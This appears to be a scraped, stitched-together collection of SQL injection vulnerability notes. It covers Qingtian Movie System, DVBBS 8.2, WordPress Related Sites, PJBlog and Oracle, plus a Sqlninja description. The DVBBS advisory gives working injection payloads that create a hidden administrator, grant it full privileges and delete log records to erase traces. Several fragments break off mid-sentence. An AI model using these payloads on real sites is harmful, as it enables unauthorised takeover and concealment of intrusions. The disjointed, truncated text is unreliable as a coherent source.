Exploiting SQL Injection from Web Applications

This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database.


晴天电影系统 (Qingtian Movie System) SQL Injection Vulnerability 0day

Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp

Code (excerpt from /look/template/wmv.asp; ChkPost() and G_error_page_1 are defined elsewhere in the application and are not shown here):
<%
' Request check that runs before the template is rendered
IF Not ChkPost() Then
    response.Redirect G_error_page_1
    response.End()
End IF


SSV ID: 15206
SEBUG-Appdir: 动网 (DVBBS)
Published: 2009-12-31
Affected versions:
Dvbbs 8.2
Vulnerability description:
DVBBS is an open-source ASP forum program developed and maintained by WWW.ASPSKY.NET.
References:

None

Test method:
[www.sebug.net]
The programs (methods) provided by this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!

Post a thread whose title is the SQL statement below, then click "Appraise" (0 = neutral, 1 = support, 2 = oppose; any of them works).
At that point the SQL statement is executed.
Database name: a','',1,'akai','2008-2-4','',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username='akai'--

Add a front-end and back-end administrator: a','',1,'akai','2008-2-4','',2);update dv_user set UserGroupID=1 where username='akai';insert into dv_admin(Username,Password,Flag,Adduser)values('akai','965eb72c92a549dd',',4,','akai')--

Enter the admin backend and use injection again to obtain full privileges: http://www.xxx.com/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45'/**/where/**/username='akai'--

Clean up the database records (three tables): http://www.xxx.com/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username='akai';delete/**/from/**/dv_topic/**/where/**/PostUsername='akai';delete/**/from/**/Dv_Appraise/**/where/**/UserName='akai'--

(Because the delete statements are executed through injection from the backend, Dv_log still ends up holding one record of the access to the backend help.asp file.)
SEBUG security advice:
None
Please refer to the official patch:
www.dvbbs.net
// sebug.net [2010-01-07]

Recently I have been looking for SQL injection software for Linux. Previously I had only used Sqlmap; today I tried Sqlninja. The tool's introduction:

Sqlninja’s goal is to exploit SQL injection vulnerabilities on web applications that use Microsoft SQL Server as back end. It is released under the GPLv2.

There are a lot of other SQL injection tools out there but sqlninja, instead of extracting the data, focuses on getting an interactive shell on the remote DB server and using it as a foothold in the target network. In a nutshell, here’s what it does:


WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln

http://wordpress.org/extend/plugins/related-sites/

/wp-content/plugins/related-sites/BTE_RW_webajax.php

eLwaux(c) 30.05.2009, uasc.org.ua

SQL-Inj

// BTE_RW_webajax.php, lines 27, 28 and 31: request-controlled values taken without sanitisation
$guid  = $_POST['guid'];             // line 27
$click = $_POST['click'];            // line 28
$ref   = $_SERVER["HTTP_REFERER"];   // line 31


Affected version: PJBlog 3.0.6.170
Program introduction:
PJBlog is a free, open-source Chinese personal blog system built on ASP + Access. It has fairly high operating efficiency and a high update rate, and it supports the newer technologies currently used by blogs.

Vulnerability analysis:
In the file class/cls_logAction.asp:

' Form values are read directly from the request (line 429)
oldcate=request.form("oldcate")
oldctype=request.form("oldtype")


From: Alexander Kornbrust

This blog entry will show a SQL Injection example based on a JSP application (tnx to Slavik) and Oracle 11.1.0.7. The Oracle SQL Injection Cheat Sheet is available on our webpage.

With Oracle 11g, Oracle introduced some security enhancements by default, e.g. the ACL for PL/SQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old well known tricks like the usage of utl_inaddr are no longer working for non-DBAs in 11g… The following tutorial will show how to bypass these restrictions and will show some new tricks…

First we start with a vulnerable webapp:
